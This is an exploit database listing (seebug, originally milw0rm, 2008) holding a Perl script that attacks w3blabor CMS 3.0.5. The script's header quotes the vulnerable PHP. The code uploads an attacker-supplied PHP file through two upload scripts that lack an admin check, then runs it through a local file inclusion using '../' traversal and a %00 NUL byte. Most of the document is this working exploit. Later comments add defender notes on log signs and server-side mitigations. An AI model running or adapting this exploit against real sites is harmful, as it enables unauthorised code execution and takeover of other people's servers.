
w3blabor CMS 3.0.5 - Arbitrary File Upload & LFI Exploit

🗓️ 01 Jul 2014 00:00:00 · Reported by RootType
seebug
 seebug
🔗 www.seebug.org👁 28 Views

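Exploit for arbitrary file upload and local file inclusion (LFI) vulnerabilities in w3blabor CMS 3.0.5, discovered by DNX on 17.10.2008 (Security Research Division 2oo8). Vendor website: http://www.w3blaborcms.de. The listing below documents two upload scripts that do not check admin privileges and an LFI in admin/inc/modul.inc.php that requires magic_quotes_gpc = Off. No vendor update is available.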

Code

                                                #!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Request::Common qw(POST);
use Getopt::Long;

#                           \#'#/
#                           (-.-)
#    ------------------oOO---(_)---OOo-----------------
#    |          __             __                     |
#    |    _____/ /_____ ______/ /_  __  ______ ______ |
#    |   / ___/ __/ __ `/ ___/ __ \/ / / / __ `/ ___/ |
#    |  (__  ) /_/ /_/ / /  / /_/ / /_/ / /_/ (__  )  |
#    | /____/\__/\__,_/_/  /_.___/\__,_/\__, /____/   |
#    | Security Research Division      /____/ 2oo8    |
#    --------------------------------------------------
#    |   w3blabor v3.0.5 Arbitrary File Upload & LFI  |
#    --------------------------------------------------
# [!] Discovered.: DNX
# [!] Vendor.....: http://www.w3blaborcms.de
# [!] Detected...: 17.10.2008
# [!] Reported...: 29.11.2008
# [!] Response...: xx.xx.2008
#
# [!] Background.: Sicher! Schnell! Einfach!
#                  Das CMS wurde durch diverse Abfragen und Konfigurationen gegen Hackangriffe
#                  abgesichert. Auch arbeitet es sehr stabil und kommuniziert schnell mit der
#                  angebundenen Datenbank. Die Verwaltung gestaltet sich als besonders einfach im
#                  Gegensatz zu vielen anderen Content Management Systemen - Und genau das macht
#                  es zu etwas Besonderem!
#
# [!] Bug Upload.: in admin/inc/media.inc.php near line 71 (no check on admin privileges)
#
#                  71: if (isset($_GET['action']) && $_GET['action'] == "upload") {
#
#                  80:          $dir = "../../includes/media";
#                  81:          $file = $_FILES['datei']['name'];
#
#                  92:          $file = strtolower($file);
#                  93:
#                  94:          move_uploaded_file($_FILES['datei']['tmp_name'],$dir."/".$file);
#                  95:          @chmod("".$dir.""/"".$file."", 0777);
#
# [!] Bug Upload.: in admin/inc/meinlogo.inc.php near line 45 (no check on admin privileges)
#
#                  45: $neueslogo = $_FILES['neueslogo']['name'];
#                  46: $logopfad = "../../includes/upload/".$settings['page_logo']."";
#                  47:
#                  48: $endung = substr ($_FILES['neueslogo']['name'], -3);
#                  49:
#                  50: if (($endung=="jpg") || ($endung=="peg") || ($endung=="png") || ($endung=="gif") || ($endung=="JPG") || ($endung=="PEG") || ($endung=="PNG") || ($endung=="GIF")) {
#
#                  54: move_uploaded_file($_FILES['neueslogo']['tmp_name'],"../../includes/upload/".$neueslogo);
#
# [!] Bug LFI....: $_GET['modul'] in admin/inc/modul.inc.php near line 47 (requires magic_quotes_gpc = Off)
#
#                  43: $modulfile = "../../includes/module/".$_GET['modul']."/".$_GET['datei'].".inc.php";
#                  44: 
#                  45: if (file_exists($modulfile)) {
#                  46:
#                  47:         include "../../includes/module/".$_GET['modul']."/".$_GET['datei'].".inc.php";
#
# [!] Solution...: no update from vendor till now
#

# Usage gate: when the fifth command-line argument is missing (or false),
# print the banner and option summary and stop before any network activity.
unless ($ARGV[4])
{
  my @usage_text = (
    "\n                        \\#'#/                    ",
    "\n                        (-.-)                     ",
    "\n   ----------------oOO---(_)---OOo----------------",
    "\n   | w3blabor v3.0.5 Arbitrary File Upload & LFI |",
    "\n   |                coded by DNX                 |",
    "\n   -----------------------------------------------",
    "\n[!] Usage: perl w3blabor.pl [Host] [Path] <Options>",
    "\n[!] Example: perl w3blabor.pl 127.0.0.1 /w3blabor/ -2 -f s.jpg",
    "\n[!] Targets:",
    "\n       -1              Upload over media.inc.php",
    "\n       -2              Upload over meinlogo.inc.php",
    "\n[!] Options:",
    "\n[!]    -f [filename]   Path to local file with php code",
    "\n       -p [ip:port]    Proxy support",
    "\n",
  );
  print for @usage_text;
  exit;
}

# Positional arguments are read first, because GetOptions() removes the
# options it recognises from @ARGV.
my ($host, $path) = @ARGV[0, 1];
my $file    = "";
my %options = ();   # file-scoped: use_bug() reads this hash directly
GetOptions(\%options, "1", "2", "f=s", "p=s");

# -f is mandatory ...
unless ($options{"f"})
{
  print "[!] Failed, see usage.\n";
  exit;
}

# ... and must name a file that exists locally.
$file = $options{"f"};
unless (-e $file)
{
  print "[!] Failed, local file doesn't exist.\n";
  exit;
}

print "[!] Exploiting...\n";

use_bug($host, $path, $file);

print "[!] Exploit done\n";

# use_bug($host, $path, $file)
#
# Builds one multipart/form-data POST that carries the local file $file to an
# upload script under admin/inc/ (chosen by -1 or -2), sends it, then fetches
# $url2 with a GET and prints whether that GET succeeded.
#
#   $host - host name or address; concatenated directly after "http://"
#   $path - path prefix of the CMS installation; concatenated directly after $host
#   $file - path of the local file to send
#
# Also reads the file-scoped %options hash (keys "1", "2", "p"). Prints status
# lines to STDOUT; calls exit in the -2 branch when the extension test fails.
#
# Defender notes: the requests this routine makes are limited to the URLs
# built below. On an affected install, the web-server log entries to look for
# are a POST to admin/inc/media.inc.php?action=upload or
# admin/inc/meinlogo.inc.php?action=upload from a client without an admin
# session, and a GET to admin/inc/modul.inc.php whose "modul" value contains
# "../" or "%00". The header comment states there is no vendor fix, so the
# practical controls sit outside the CMS: restrict admin/inc/ to authenticated
# administrators at the web server (this covers both upload scripts and
# modul.inc.php) and disable script execution in includes/media.
sub use_bug
{
  my $host = shift;
  my $path = shift;
  my $file = shift;
  
  my $ua       = LWP::UserAgent->new();
  my $url      = "";   # upload endpoint (POST)
  my $url2     = "";   # URL fetched afterwards to judge the outcome (GET)
  my $req      = "";
  # Captures the part of $file after the last '/', '|' or '\' (the '|' inside
  # the character class is a literal). The match result is not checked.
  $file        =~ /.*[\/|\\](.*)/;
  my $filename = $1;
  
  # Optional -p ip:port: send HTTP requests through that proxy.
  if($options{"p"})
  {
    $ua->proxy('http', "http://".$options{"p"});
  }
  
  # -1: media.inc.php. Per the header comment the server stores the file under
  # includes/media using the lower-cased client-supplied name, with no
  # admin-privilege check.
  if($options{"1"})
  {
    $url = 'http://'.$host.$path.'admin/inc/media.inc.php?action=upload';
    $url2 = 'http://'.$host.$path.'includes/media/'.$filename;
    # [$file] makes HTTP::Request::Common read the file from disk as form field "datei".
    $req = POST $url, Content_Type => 'form-data', Content => [ datei => [$file], ];
  }
  # -2: meinlogo.inc.php, then modul.inc.php. Runs after the -1 block, so if both
  # flags are given these assignments replace the ones above.
  if($options{"2"})
  {
    # Client-side check on the local file name only. The server-side test quoted
    # in the header compares just the last three characters of the uploaded
    # name; an extension test does not constrain file contents, and the
    # include() quoted in the header runs whatever the included file holds.
    if($file =~ m/.*\.jpg|peg|png|gif/i)
    {
      $url = 'http://'.$host.$path.'admin/inc/meinlogo.inc.php?action=upload';
      # "modul" carries a "../" step out of includes/module/ and a trailing
      # URL-encoded NUL ahead of the "/".datei.".inc.php" suffix the server
      # appends (see header). The header notes this needs magic_quotes_gpc = Off;
      # PHP 5.3.4 and later also reject paths that contain a NUL byte.
      $url2 = 'http://'.$host.$path.'admin/inc/modul.inc.php?modul=../upload/'.$filename.'%00';
      $req = POST $url, Content_Type => 'form-data', Content => [ neueslogo => [$file], ];
    }
    else
    {
      print "[!] Failed, rename your local file to .jpg\n";
      exit;
    }
  }
  
  # The POST response is discarded; the outcome is judged solely from the HTTP
  # status of the follow-up GET.
  $ua->request($req);
  my $res = $ua->get($url2);
  if($res->is_success)
  {
    print "[!] File uploaded\n";
    print "[!] Check your file @ ".$url2."\n";
  }
  else
  {
    print "[!] Failed\n"; 
  }  
}

# milw0rm.com [2008-12-07]

                              
